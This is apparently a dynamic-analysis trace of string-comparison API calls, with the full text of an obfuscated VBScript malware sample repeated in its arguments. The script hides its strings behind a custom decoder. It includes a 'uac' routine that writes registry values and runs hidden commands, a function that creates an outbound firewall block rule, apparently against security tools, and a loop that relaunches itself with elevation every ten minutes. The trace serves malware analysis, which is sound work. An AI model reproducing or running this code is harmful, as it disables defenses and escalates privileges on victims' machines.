WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0226.356] wcsncmp (_String1=" = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.356] wcsncmp (_String1="= CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48 [0226.356] wcsncmp (_String1=" CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.356] wcsncmp (_String1="CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' 